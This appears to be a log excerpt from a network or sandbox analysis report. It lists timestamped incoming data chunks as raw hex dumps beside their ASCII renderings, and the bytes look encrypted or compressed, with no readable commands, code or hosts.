2022-11-03 22:35:57 UTC	289	IN	Data Raw: 49 4e 7b 14 b9 26 72 72 10 4f 35 ff 91 51 73 e8 f7 a8 6d 9a de 4d ee 19 c8 b4 59 80 66 33 e1 0d 77 ec fd 70 44 bd 1e 9d cb 80 a9 d4 28 3c 9d 75 9d a8 5d 37 0d 51 20 96 c8 ee 45 d6 b0 07 93 e0 fe a2 5b bd 40 c8 c1 c1 d3 76 a8 8a 2f 3c ac 39 b6 ee ae b8 61 1d d8 84 2b 0b d3 2e 2d a2 d0 04 0d 37 81 5e 2b 56 f6 a0 c3 84 55 94 a8 d2 c8 53 71 55 b7 ec 35 71 fc 57 70 8d 1f 1d fc 87 49 01 d9 4d 70 13 4c 1d f2 fd 9b 7d 41 ab 8f ba 35 cd 56 c2 87 6d f1 82 2e 8c d7 84 e4 4f aa ec 21 dd 37 7b f6 af fd 85 60 21 e5 83 f6 fd ea 0b 40 43 98 71 08 f2 31 df 64 f2 ad 0e 8e 6f e0 5e cb 25 82 a1 df 35 d7 c6 fc 60 14 f0 d8 db fd 86 b5 12 d7 a4 81 66 21 c2 6a 43 ba 77 1e 23 fc e9 0b d0 d1 49 87 73 05 61 d1 f3 c0 61 6c 9b f3 3b 2b 7b 73 c1 79 d5 65 db 95 c4 fd 93 82 76 68 70 a5 Data Ascii: IN{&rrO5QsmMYf3wpD(<u]7Q E[@v/<9a+.-7^+VUSqU5qWpIMpL}A5Vm.O!7{`!@Cq1do^%5`f!jCw#Isaal;+{syevhp
2022-11-03 22:35:57 UTC	297	IN	Data Raw: 28 ff 6a 6d db 5d 09 ef 3b c1 06 2e a1 50 76 c8 06 08 e3 a9 51 f2 73 ae 94 e7 fb 60 bb 23 24 b3 2b 2c f8 55 cb 81 d3 94 b0 1a 76 bd 92 e0 a5 89 61 50 5d 7a a8 21 9e 7d 80 97 a4 67 2c ec 5a c7 8c 3e 5b 56 a2 4e 8f 1e f4 cb bb e4 48 a8 ec d3 8c d3 d8 e9 43 32 fa 11 6b 41 cd 98 52 68 73 9e 9e 01 cb 07 92 0f 51 b8 e9 97 55 8f eb b2 12 ca e6 96 94 88 49 c0 bd 99 70 91 bf f7 e8 76 3d b7 e7 fb a3 98 bc 8e 5c 93 54 00 2c 4c 32 e9 2b 82 75 7c 32 fd 5f 2c a0 1d fd 49 0f 54 4e 78 4d d8 c5 86 0b 69 e5 47 8e 48 58 37 5e e0 9c 04 46 84 63 be 6c 7a ab 1a 4d 9b f7 15 6c 12 c4 0a 9e e6 0c c5 87 d1 83 38 b8 40 06 f1 5f 5b 1b 7f 69 87 e5 aa 02 bd aa 1a 6e b7 c5 31 99 93 9b 25 c1 c3 a6 c6 a0 14 94 fc 56 08 b4 aa b0 ea 35 dd 8a b9 50 1d 20 66 f7 e9 5f 3f 2d 66 b8 fb 8c a1 45 Data Ascii: (jm];.PvQs`#$+,UvaP]z!}g,Z>[VNHC2kARhsQUIpv=\T,L2+u\|2_,ITNxMiGHX7^FclzMl8@_[in1%V5P f_?-fE
2022-11-03 22:35:57 UTC	305	IN	Data Raw: c2 9b 61 92 aa d2 1f 21 ac 4e aa 13 47 ce 81 0c 17 48 15 bf c5 c8 b2 2e 80 10 44 7d 0f a5 1d 59 4a 8f 72 b1 d9 46 fe 86 ba 41 24 6f bc 28 4b 67 01 82 9c fb 24 2d be 57 e2 9a fc f9 58 a8 65 14 33 4c c3 c7 b9 cd 15 1b 49 69 88 7a 82 a0 10 7e b6 b2 99 5a b9 ca c7 e7 7f b2 fa 77 9b 53 78 fc 50 4f d7 54 68 5e 08 c0 3e a2 de 3e d9 24 2d ec 7f dd fd 9c 13 1b 59 00 6e 50 f8 04 40 e1 bc b0 61 a6 88 1b e6 33 d9 b0 d6 f6 c7 4f 94 b4 c9 35 a1 a3 f0 8a a9 5b 90 ee eb 77 81 33 bd 7d 58 c2 85 6e a0 68 f8 4e 88 e4 c3 7c 1e 20 7c 7e 14 cf 4b 5f 80 55 c6 eb 56 09 2e fa 29 0b 83 e5 24 74 71 17 1f 0e 39 bc 99 08 90 59 9f b7 02 d9 39 2c 55 76 88 9a 66 95 bd 06 3d dd c2 b2 c8 16 b3 e7 c5 b7 6e b1 49 c2 e9 6e eb 3d 72 1a a2 67 7d 08 8c 3f f1 3c 52 6b 35 15 bf 84 7f 7b 84 e4 e4 Data Ascii: a!NGH.D}YJrFA$o(Kg$-WXe3LIiz~ZwSxPOTh^>>$-YnP@a3O5[w3}XnhN\| \|~K_UV.)$tq9Y9,Uvf=nIn=rg}?<Rk5{
2022-11-03 22:35:57 UTC	313	IN	Data Raw: 44 d5 17 5b 37 19 c4 1d f0 b0 83 81 ab 14 44 83 18 ff e5 51 a7 f3 6c 3a 0a 93 39 ed c7 13 91 92 80 84 01 ad 43 76 8b 0a 60 b8 64 fa 40 2d 1e b3 9d 9b 23 a9 97 ef fe 1d b7 de 6a 0f d6 68 8f e6 77 f5 aa c5 e6 d6 8d 75 d1 02 fe 8b 8a 12 3e 59 40 2d ab 69 9b a4 c5 8f c8 c4 8a ab 2b f7 86 32 3e f7 82 a7 33 09 42 99 0a 2c 45 45 d1 1b b8 42 ec 35 3b 06 16 b5 5b 05 f7 e4 5e 9c f6 1e b2 73 ee e2 0a ff 81 f2 05 fb b3 76 82 c9 6a d2 41 1c 17 0b cc 37 1c dc 44 86 17 22 d9 a2 d9 ec c2 08 a6 cf c2 51 05 33 68 d8 f0 78 a2 8b 91 18 09 d0 55 fd 67 24 18 34 37 b6 51 11 44 fc ea 3c c9 13 ba 83 a1 26 e5 e9 bf 08 50 be 82 bf 43 37 9e af 85 b0 4a c8 5f 6e 67 0f 90 93 61 56 47 77 e9 e2 11 e6 17 34 48 22 7f 54 5c 14 15 68 08 dd 99 3d 5d 9a 67 f3 a8 f1 fd 22 00 53 f4 c1 3d 8b 32 Data Ascii: D[7DQl:9Cv`d@-#jhwu>Y@-i+2>3B,EEB5;[^svjA7D"Q3hxUg$47QD<&PC7J_ngaVGw4H"T\h=]g"S=2
2022-11-03 22:35:57 UTC	320	IN	Data Raw: 21 ce 35 2c c8 aa 88 9b 4c 0d 14 11 20 f4 c4 09 19 46 1a 5b a2 38 22 a1 47 da 27 be 84 00 11 4e 93 2c 44 3f 61 8d 75 31 a7 7f 29 36 77 c0 a3 8f 1e cf 37 ef 77 37 2d 4b a3 d8 a4 31 2b 05 73 a1 5e 25 77 6c fa 1e 23 f5 a6 01 03 20 27 63 93 29 a9 65 c1 10 5b e5 a1 ff 11 af 39 a0 7b 81 7c d3 23 35 6f 56 ce 11 e6 29 f4 63 ed 45 d8 d4 7f e5 8b 39 3d ac 1c ae 17 89 60 81 62 fe fb 44 8c 12 c9 14 3f a0 10 2c 6d e3 30 47 bc f2 9a 1a 15 fb 68 e3 bc b0 17 7e 90 ab 60 0a 69 9b 65 cb 8f d9 65 cd 0e d0 da e6 4e 9f 9a 9e 92 df 6b 88 15 07 dd 00 0d 59 d3 47 7f da f6 5c 62 d9 60 69 5f 13 29 2d 3b 0e bd d7 ea 2b e9 a8 2d 08 d8 f0 7c 2a e1 09 0d 8e 79 87 a4 45 5d cc fc c4 32 db 9d 7e 36 89 75 5f 99 6f 2f 0a 55 ac 1c 11 ca 15 ee c2 e8 df 78 db 9f da 2d f6 69 36 d7 8c 82 24 ec Data Ascii: !5,L F[8"G'N,D?au1)6w7w7-K1+s^%wl# 'c)e[9{\|#5oV)cE9=`bD?,m0Gh~`ieeNkYG\b`i_)-;+-\|*yE]2~6u_o/Ux-i6$
2022-11-03 22:35:57 UTC	328	IN	Data Raw: 73 f1 51 2f ad 12 08 b1 64 40 02 af bb b3 c9 18 ef 87 3e 4f 4a b4 01 9b 53 e0 c8 a0 99 2d 8a c3 d1 2a 4d 57 6a 5a f0 75 fc a0 84 94 f7 19 17 c3 49 6e 24 13 2f bc 6b 16 a3 0d d8 03 00 94 b9 c7 fa 56 95 2c 9f 29 04 87 da 46 06 3a 8e cd 21 a5 9d 00 ac cd ec ee de 76 46 85 00 be 61 79 75 1c 88 0b 00 ae de 3c 9a 0a 0e d6 af 8b 09 4f d8 e0 ce c7 ff 5d 9b f7 69 88 bc 17 f4 84 e9 b5 73 56 27 77 98 79 7c 5a ec ec 31 b3 c1 0b 42 32 cd cf ff 59 3d 2a 2e bd 0c 90 fa bc 5e 7d 0b 60 8d 83 92 01 be 4e 3a 2f 28 9f 81 64 57 c6 16 86 23 99 eb 4e 51 4a ca 43 2a 95 cb e8 3f d3 e5 b2 c7 67 a9 70 89 a8 6b 7d 9e 34 d1 87 6f ed 75 2c 45 0f 39 1a 12 61 03 4f 4f f1 e9 0f e4 9f 3d d2 d3 fe 06 e6 68 13 6a e5 48 01 e9 f3 82 51 77 42 0e 38 ee 78 e8 bd 55 64 fd 57 c7 ba d2 ea 08 9c 8a Data Ascii: sQ/d@>OJS-MWjZuIn$/kV,)F:!vFayu<O]isV'wy\|Z1B2Y=.^}`N:/(dW#NQJC*?gpk}4ou,E9aOO=hjHQwB8xUdW
2022-11-03 22:35:57 UTC	336	IN	Data Raw: 55 8c 52 8c 85 c2 79 82 56 d0 25 a3 f7 ab 5e 5a d5 ab 71 16 10 f6 6a 0d a2 96 d1 1c 88 ba 60 a1 1d 5a b6 a0 01 85 91 c4 2a 5c fc 68 8f c0 85 6f b8 f8 d0 0d 37 2f 7a 3f 62 d9 95 c0 89 c7 92 97 85 73 e9 9d 22 13 06 da bf 0d 00 31 6a 0a ce ac 57 78 76 00 be f7 a2 85 c7 d3 ff 49 84 3d 67 cc 2a 11 40 a8 4e 43 f1 e9 f9 03 32 16 7e 7f 8b 58 82 84 58 b8 8d 25 52 7d 20 ac b4 8f cc a4 d4 25 27 80 c9 40 3c 33 d9 f8 cc 99 06 a4 23 e1 b8 8d 39 ff 89 60 2f 8a 4a d1 4c 20 c5 da aa 66 1a eb 72 b4 b0 30 a6 33 7c 17 f6 47 d3 8a a2 00 f4 68 60 b6 62 52 d4 40 2f 11 99 c7 b4 60 ec cf b4 c9 c4 bd 8c 17 0a f9 9f de ea 84 3a 2b 24 12 ab 6d da 3d b0 0f a2 d9 d9 78 26 1e 58 b2 10 ac 1c 2d 2f 4e a6 5d cd e1 79 3f 3d cb 7a da ec e0 17 43 3c 4e 81 6a c2 ff c2 6b fe 71 37 cf 94 a8 a0 Data Ascii: URyV%^Zqj`Z\ho7/z?bs"1jWxvI=g@NC2~XX%R} %'@<3#9`/JL fr03\|Gh`bR@/`:+$m=x&X-/N]y?=zC<Njkq7
2022-11-03 22:35:57 UTC	344	IN	Data Raw: 3d 3c f6 f8 89 60 18 8a b4 ae 32 ed bb b5 dd 9c 13 1b 05 38 57 e2 84 d7 98 18 1f 48 44 81 3c ec c2 9b 61 92 aa d2 1f 21 ac 4e aa 13 47 ce 81 0c 17 48 15 bf c5 c8 b2 2e 80 10 44 7d 0f a5 1d 59 1c a8 49 28 14 7a c8 df ef 94 6a fa 1a 07 87 90 4c 73 17 cf e1 91 bc d3 f8 78 61 6a 17 26 1e 3c 35 3b 60 8b 5c 78 19 43 33 4c c3 c7 b9 cd 15 1b 49 69 88 7a 82 a0 10 7e 7a 23 71 51 47 3b 1d 48 78 ec ac 18 a3 f4 cc 0b 5f cd 4e 1c 21 c2 0e 8a 3e a2 de 3e d9 24 2d ec 37 b4 71 ec fe bd 27 e7 6e 50 f8 04 40 e1 bc b0 61 a6 88 1b e6 33 d9 b0 d6 f6 c7 4f 94 b4 c9 35 b6 9d d9 c6 e8 c7 c8 31 eb 77 81 33 bd 7d 58 c2 85 6e a0 68 f8 4e 88 e4 c3 7c 1e 20 7c 7e 14 cf 4b 5f 80 55 c6 eb 56 09 2e fa 29 0b 83 e5 24 74 dc 10 ff c3 c3 01 be 24 fa dc 62 40 03 02 3c 1a 55 76 88 9a 66 95 bd Data Ascii: =<`28WHD<a!NGH.D}YI(zjLsxaj&<5;`\xC3LIiz~z#qQG;Hx_N!>>$-7q'nP@a3O51w3}XnhN\| \|~K_UV.)$t$b@<Uvf
2022-11-03 22:35:57 UTC	352	IN	Data Raw: 3b 86 ae 51 22 b1 2f f7 87 56 79 65 77 16 e9 51 0c 2c 2d aa cb 5c b1 85 be 61 8d 70 68 1f 14 da 27 49 4a cf 6e 59 a3 b9 fe c4 64 a8 9b 3e 5f ff 0b 80 5d a3 d9 0b d0 d2 dc 58 f2 f8 9c 0a 2e be 5b dc 2c 3f a8 7f 3c 49 53 69 c0 4e ac e7 11 87 0e 69 72 2a 23 aa 1f 0c 5f 22 56 cb 30 99 c3 3a db 0b a1 5f ad a7 21 d5 f5 29 bc 2b 08 7b a0 f3 04 c0 81 ae 13 83 05 84 6e 44 4d d6 2a ee b6 a7 db 0b a1 5f ad a7 21 d5 e0 d4 e8 d6 47 7d 50 51 af 12 69 2a 8e 40 44 2d fa ed 9f cb 98 a4 01 ea af 12 69 2a 8e 40 44 2d ed ea 8a b4 0f d9 68 65 e9 62 a9 19 57 1c 79 ea f1 d8 9a 5d 16 40 de fa cf 92 f0 35 0f d7 0d 9a f4 78 13 c3 4e 2f fc 24 9d 40 e7 49 f6 73 67 7b f4 f7 13 7e b6 96 25 cf 89 ab df 79 a7 c0 60 c9 73 c7 6d 13 17 fa 04 f9 46 06 8c 31 9d 0e 5f b9 2a 77 c5 d9 04 32 88 Data Ascii: ;Q"/VyewQ,-\aph'IJnYd>_]X.[,?<ISiNir#_"V0:_!)+{nDM_!G}PQi@D-i@D-hebWy]@5xN/$@Isg{~%y`smF1_*w2
2022-11-03 22:35:57 UTC	359	IN	Data Raw: c9 c6 69 46 2a 09 97 c4 7f 1e 0d 23 7a 52 92 9c 78 29 8a f5 9c ba fe b5 57 1e bc a3 6c ad 34 80 d5 15 ad 73 1f a8 13 db 27 b8 a0 00 3a 38 18 85 e4 61 da 19 86 bb c8 3f dc 43 ef 71 4b 4c 9c 2d 07 15 77 d2 b5 a0 35 19 4d a6 ae c3 2e a6 a0 3a 06 ef 39 3e c0 fc 3f 71 e2 3b 3c 69 a4 85 c9 05 51 22 72 1c c4 cb b9 ec f2 49 95 be 37 d2 ae fc 73 74 26 f1 7b 09 2e c4 48 8b 95 5f 79 39 bf 3e f2 49 95 be 37 d2 ae fc ba 5e e9 e8 8a 61 d1 37 29 95 5a c3 2a ef 37 3f f2 49 95 be 37 d2 ae fc 81 a4 32 da 4a 8e ef 2e 6c a8 2c 70 75 a1 6f 48 f2 49 95 be 37 d2 ae fc a4 65 0e 4e ec a0 eb 23 0b 4e 2d c0 82 a7 ab 21 92 e1 95 03 75 d6 be d9 63 ce ea d0 23 a6 04 d3 fe 2d 51 00 51 1a 07 6d 1f 6e 13 a1 0e 61 84 1b ff c9 b1 7e dc a8 1b 11 0e e1 c6 fd 87 56 5e 1f c8 fb 07 48 b3 2e 8e Data Ascii: iF#zRx)Wl4s':8a?CqKL-w5M.:9>?q;<iQ"rI7st&{.H_y9>I7^a7)Z7?I72J.l,puoHI7eN#N-!uc#-QQmna~V^H.
2022-11-03 22:35:57 UTC	367	IN	Data Raw: 65 01 ad 63 d2 be a1 c4 65 01 ad 63 d2 be a1 c4 65 01 ad 63 d2 be a1 c4 cf 27 33 66 43 f5 ae 56 1c 43 8e 99 1a 87 24 b1 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 Data Ascii: ececec'3fCVC$pnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnp
2022-11-03 22:35:57 UTC	375	IN	Data Raw: d6 5f df e4 69 d8 1c 2e 8b 8c e3 dc 71 b3 3a a6 7f 74 8e d2 be a1 5a 2b 99 05 b3 8c 57 77 98 4e d6 5f df e4 69 d8 1c 2e d5 c9 79 37 d8 6a 3c d2 cf ad c8 b7 df 02 47 70 ed a2 2b 1a 41 1c b8 65 88 9b 23 9b 69 6f 76 3f 97 d8 9d fa bb 3d 86 0f 7a b4 5c 82 3a a3 7d 8b 6a ed 61 87 fa 1a c2 f0 30 c0 e9 2d 25 89 66 43 50 54 27 dd f0 a1 25 e0 26 70 b6 1c 84 26 d2 5b 3d 75 3c 4e 11 71 fc 44 30 c0 e9 2d 25 89 66 43 d5 8a 74 fa 94 52 25 76 c1 50 57 23 5a 45 43 a4 37 49 e1 e6 62 2d b7 4f 3d 75 3c 4e 11 71 fc 44 30 c0 e9 2d 25 89 66 43 d5 c9 79 37 d8 6a 3c d2 cf ad c8 b7 df 02 47 70 ed a2 2b 1a 41 1c b8 65 47 9c 4c 68 55 59 47 8a 9d 15 d0 06 eb 05 c2 2b 7a b4 5c 82 3a a3 7d 8b 95 8b 8e 95 b3 84 65 9e 0d d6 da 84 4c c8 b8 2a b8 46 33 20 8b e9 f9 8f 1c 9c b3 e7 84 ad 9d Data Ascii: _i.q:tZ+WwN_i.y7j<Gp+Ae#iov?=z\:}ja0-%fCPT'%&p&[=u<NqD0-%fCtR%vPW#ZEC7Ib-O=u<NqD0-%fCy7j<Gp+AeGLhUYG+z\:}eL*F3
2022-11-03 22:35:57 UTC	383	IN	Data Raw: 4a 8b fc 1a 5c 10 f4 e7 b4 14 0f 26 86 0f 92 b7 44 02 f4 fd 81 a0 66 04 9c 1b ac 71 c3 eb 59 8d f9 a3 96 13 05 c2 53 6a e9 f7 66 9b 49 ac 3a cd c4 02 36 af 8f ad 02 ad 67 fc de 05 d3 58 ec 79 b2 75 cf 5c 83 5b 41 ce 33 d7 1c 67 c2 89 db c2 8d 1e 47 84 ee 0b fa b9 39 fe 2b aa 67 9c 00 91 f0 97 fd 01 5e 1e 8a f3 7f 6f bd da 82 f9 14 27 86 77 75 5f 9d 12 b6 16 ec 6e d6 fe 6c 07 a8 72 96 68 83 94 76 8e 3f 9e 53 bf cd e4 1c e5 ef c0 a8 a3 e0 59 99 54 db 5b e6 58 4c dd 28 9a 21 c2 6f fc d8 2d e7 88 72 c6 d0 36 c4 23 f1 86 7f 5e 3c b5 48 bb 51 00 f6 90 28 1c 88 36 44 4f ae a6 ea a6 0f a8 65 8c dd 74 7c ce 75 5e ae 90 20 86 f7 62 21 5d 93 e2 6d 4c c9 22 f9 93 98 30 36 80 a2 76 11 25 44 8e 74 e4 96 87 f3 5e 59 f1 cf b9 75 0c 4b cf f4 49 37 54 bf 7d bc b0 6f 03 8e Data Ascii: J\&DfqYSjfI:6gXyu\[A3gG9+g^o'wu_nlrhv?SYT[XL(!o-r6#^<HQ(6DOet\|u^ b!]mL"06v%Dt^YuKI7T}o
2022-11-03 22:35:57 UTC	391	IN	Data Raw: 80 12 56 aa 2d 15 94 ff a7 0d 66 c3 e4 3b be 11 59 5f 48 d4 53 a3 99 ff f2 5a 72 fe 98 c4 6d 19 22 8e 8a b2 ed 1f 05 05 e1 f8 2e 15 93 b2 5b ea 7e fa 15 e9 ea 34 8d 28 7c 2f 34 d4 93 a5 ca 7b 43 0e a4 2a 2e 20 bf 85 00 23 7d b0 23 a2 75 db b8 15 03 7d 80 ce de e4 2d 63 a6 40 59 74 08 ec 1a 81 47 f7 f0 16 2c ed 79 66 b1 11 f6 30 f6 8b 8b 45 c9 85 27 00 29 a6 8a b2 a0 76 29 dd 21 45 a9 67 0c 44 76 c6 76 f7 dd 9d 3c 55 a9 b4 aa 1c 17 cc ea a5 ae ee b7 a9 c0 69 3f ae 8b df 69 67 56 41 0a bd 08 df d5 ba 0b f2 57 94 e1 53 56 f0 e4 7f 9b 77 96 db e6 b1 ac 13 71 dc 7d 3e a9 14 21 a1 53 9a eb 6d 24 0f 5a fd 75 b5 f9 68 91 b3 08 0f 94 3c 14 01 ee 6c c8 a6 29 35 28 e0 e4 34 5b 2c 81 6d 03 48 5f 18 21 86 f7 bf 6f ab 86 62 29 16 ee 2a 8c 49 46 62 69 80 ad 61 53 2e 04 Data Ascii: V-f;Y_HSZrm".[~4(\|/4{C. #}#u}-c@YtG,yf0E')v)!EgDvv<Ui?igVAWSVwq}>!Sm$Zuh<l)5(4[,mH_!ob)IFbiaS.
2022-11-03 22:35:57 UTC	398	IN	Data Raw: 6f f6 72 3c 55 c8 65 a7 b1 5c 98 27 ed 39 da 1f 6b 51 8d c2 91 76 14 99 f2 e1 f4 f6 c7 10 3a 89 60 97 3e 50 4b c6 e9 9a 8f ed 2b 0a e9 78 ca 3d 9f 60 8b 6a 60 59 3b 91 c1 1a 29 53 95 95 4c 67 ff 16 60 9d f5 c8 be 02 e7 3f 9d bb 30 a6 a6 02 7e b9 1f 3b 7d d4 5c 35 12 f6 a3 14 8f 0b 9e 03 1b 5e ac 39 12 bf 13 7a 89 85 00 a6 13 d4 95 2d 46 f1 9e 22 3e ac 3f bc 5a fa 78 41 e3 8c 3f 7f 97 84 9b e3 f0 11 71 1c 1e d7 2c c4 ef 49 5e 09 02 9c 3e 93 c4 72 35 6e a2 8b bc 2b e5 50 cf a7 26 07 ed d9 6c 86 8d bd 0c 3b b0 49 72 83 21 98 38 c4 bc e7 fb 26 4d 25 c0 3a d3 54 dd fb 78 81 65 ec 85 1f c8 97 17 48 24 fe e1 ef 79 b3 63 1e da db 72 2e a9 8a 4e 56 73 88 05 41 9e 71 2f 12 99 9d 25 ef b1 21 fd c6 6d c2 7e 2b 4a 21 27 85 f3 b6 3e 8d 86 2f 5c b6 84 95 01 76 f9 1e 38 Data Ascii: or<Ue\'9kQv:`>PK+x=`j`Y;)SLg`?0~;}\5^9z-F">?ZxA?q,I^>r5n+P&l;Ir!8&M%:TxeH$ycr.NVsAq/%!m~+J!'>/\v8
2022-11-03 22:35:57 UTC	406	IN	Data Raw: 14 b3 b5 44 ce a0 4f db 1f 13 7b 47 f3 a4 77 5d 89 a7 fa 3b b7 b8 9f f2 ae 5f 78 f5 26 64 ca b1 23 d6 be 36 64 e2 e4 c1 a2 02 9c 76 a9 d3 d4 53 14 80 86 31 65 2c 29 5b fc 91 b3 ae 11 35 e8 34 d8 98 49 f4 9b c6 10 7a 4e d6 39 bf cf 47 bb 3e 13 70 4c 54 d0 c0 24 28 a9 2b 6d 24 43 18 f0 6c ff b2 a3 4a 9c 22 14 a8 02 07 81 26 0c 9c 26 ef e7 19 98 ef 32 19 3b 93 ee ac 49 41 51 2f 53 75 e7 28 9f 11 aa 5c e6 6e 8d 53 54 33 8e d8 4e a9 f9 f7 df 9c 55 85 e3 d6 b6 a7 67 8b 09 24 ec f0 04 04 58 63 ae bf b2 94 23 6e fa 68 61 c3 4b 7b e0 93 c7 60 5f 86 4b 59 15 c2 16 df 46 97 e5 7f 61 8f e9 77 17 41 d1 27 5e 74 fd 1d 8e 8a e0 f5 74 19 05 df e5 86 5a 83 5b c7 7f 67 35 28 a8 96 28 22 ea d2 f5 9e d7 48 a5 d0 79 85 28 1c 06 fb f2 d5 2c f0 d0 2c fb 67 ca 79 22 0b d9 2d 68 Data Ascii: DO{Gw];_x&d#6dvS1e,)[54IzN9G>pLT$(+m$ClJ"&&2;IAQ/Su(\nST3NUg$Xc#nhaK{`_KYFawA'^ttZ[g5(("Hy(,,gy"-h
2022-11-03 22:35:57 UTC	414	IN	Data Raw: 6a b3 81 dc 29 a5 c7 04 7e ee ee 22 e8 36 67 21 76 7d b1 50 2f 17 5b 28 c4 c1 a7 ab 05 19 17 47 cb 22 24 1d 61 90 fb 0a 57 a1 e0 c8 dc 3b 50 d0 41 ef 6c fb 03 4f fe 07 38 83 86 8d 3c 0d a6 f2 94 ef b0 20 e3 5e df 50 bc 06 a6 55 1e de 0d cb 36 d8 71 94 ff b3 fe e1 71 e3 f0 a5 81 4a d8 af 4b 42 9e 49 6e 41 c1 90 07 0a ea 3d a3 cf e9 da 83 6c d8 e5 cc 91 1f 78 5b c9 eb b6 41 50 59 17 bc 0a d4 8c a8 9d 54 82 c9 a6 ce ed e6 7f e3 8a f5 10 58 39 85 35 33 8f f4 e3 a0 12 9e bd 6f 8d 7a b0 2e f1 c6 34 82 50 66 d4 ba 47 ca 7a 51 81 56 a1 32 ad 47 e0 72 0f dd d9 e2 5d 4e 6d 32 20 32 aa 6a 80 89 c2 0f f6 4e 76 a0 6a 4f ba 70 36 e2 6c 34 d5 e7 f3 ba df 37 f0 e5 cb b3 a3 77 dc c4 c1 a7 ab 05 19 17 47 7b d1 aa e9 3d da a1 9d 09 a3 16 3b 01 9d 53 c7 81 cb f2 d6 cf 42 93 Data Ascii: j)~"6g!v}P/[(G"$aW;PAlO8< ^PU6qqJKBInA=lx[APYTX953oz.4PfGzQV2Gr]Nm2 2jNvjOp6l47wG{=;SB
2022-11-03 22:35:57 UTC	422	IN	Data Raw: a4 23 30 54 fb 09 b0 31 94 24 36 a9 7b 2b c6 5e 5e 0e f5 70 c7 fc b6 5d 98 19 43 8c 2e 9b f0 63 ae 51 b6 10 e8 35 94 62 ae e3 54 d3 4f f0 0e eb 39 4a 3b ed 8c 62 c5 c2 f0 66 29 d9 b4 7d 58 01 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e aa c1 84 f0 39 6a dc 16 6e 37 da e9 b7 9a 88 18 ba 75 3b 07 64 3a 1b 9e 73 54 ee 31 15 81 3a 74 6b 9a e2 54 0e 11 6b 8c 68 b9 8e 92 37 e9 bc 9d f1 e0 2e 64 4a 15 d7 d8 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 dc 74 36 5a e5 66 b5 d7 Data Ascii: #0T1$6{+^^p]C.cQ5bTO9J;bf)}Xpnpnpnpn9jn7u;d:sT1:tkTkh7.dJt6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zft6Zf
2022-11-03 22:35:57 UTC	430	IN	Data Raw: bd b0 0e 70 80 da a5 6e 04 56 65 d3 03 2c b2 23 f0 fa cd ba 23 08 37 e2 bd b0 0e 70 80 da a5 6e 64 36 c6 43 e9 ec 0a 94 bd b0 0e 70 80 da a5 6e b3 22 aa 3e b6 6b 0d e7 b7 dc 08 62 9f 0a 6d 85 47 bd 3e ec b5 2d 9c 79 c1 a9 d5 25 2e f0 30 8e e8 90 9b 43 03 8b 97 1b fd 63 9e e1 c0 c4 48 0b bd b0 0e 70 80 da a5 6e ef 5b 96 eb 35 51 fd 38 0f af ea 62 de cc df b3 6b 48 d2 f8 97 57 fd 1a f6 3c 80 77 7f ad c4 b5 56 ed 64 f6 6c 19 3f 72 b3 85 51 4a e3 ea 8e 68 4b bf 2a 3c f8 ed 2a 25 b9 ad b9 18 a3 5f 95 e6 1c 5b b7 cf a7 5b bc 18 0f af ea 62 de cc df b3 bd b0 0e 70 80 da a5 6e eb ac c0 6b d1 ee cc 45 d6 1e ed ac 52 9d 74 6d cf e0 7e ea df 89 28 80 4b 4d 66 e3 d3 3e 1b 90 09 75 34 50 be 79 69 60 14 66 09 20 88 bf c6 e1 6c 26 6c 17 dd 45 f8 48 e8 90 9b 43 03 8b 97 Data Ascii: pnVe,##7pnd6Cpn">kbmG>-y%.0CcHpn[5Q8bkHW<wVdl?rQJhK<%_[[bpnkERtm~(KMf>u4Pyi`f l&lEHC
2022-11-03 22:35:57 UTC	438	IN	Data Raw: fa f0 8c 21 ec 1a cf 93 63 15 88 bd 34 7d 94 b6 0a 2e a2 5c 7a fc cd 6c b4 e9 d6 f2 b5 92 ad 93 a4 83 7b da 4e ee 14 2d c7 3c c5 66 95 13 54 68 6b c8 fb bf 9f 22 5c 3d f7 e8 d9 66 d5 e3 48 25 1a fe a0 65 ff 7c 7c 35 8d bf b8 f0 2a 4b 96 55 bf 8d 55 cc 98 9b 6a 84 a6 89 7f 23 33 08 37 5e 1f fb a2 d5 87 ef 3b 82 6d e9 50 64 11 1b 6e d6 15 b2 20 b1 19 e3 9c dd ac 5f 82 ba d3 c9 8e 74 c1 96 7c 51 c2 44 75 a0 25 0b d9 97 80 0c 0c b4 5d bc c2 f6 c3 69 2e b3 6c 49 96 63 a9 8f bb 62 59 3d b6 b0 ae 5f 34 7d 3f c2 2f 3f 95 43 59 91 e3 8b 64 ca 50 21 da d5 60 d2 55 4b 78 b6 9d 7c b1 60 22 f1 85 49 96 89 06 54 11 b8 dc 29 d1 91 7e 59 6b 5d 33 ad ab 08 de e8 94 c5 12 ec ad 20 2a 39 5d c2 d3 46 64 01 d5 d3 77 38 f4 af 90 aa 99 a9 77 9e 80 fe d5 4d 33 1c 79 72 85 e4 16 Data Ascii: !c4}.\zl{N-<fThk"\=fH%e\|\|5KUUj#37^;mPdn 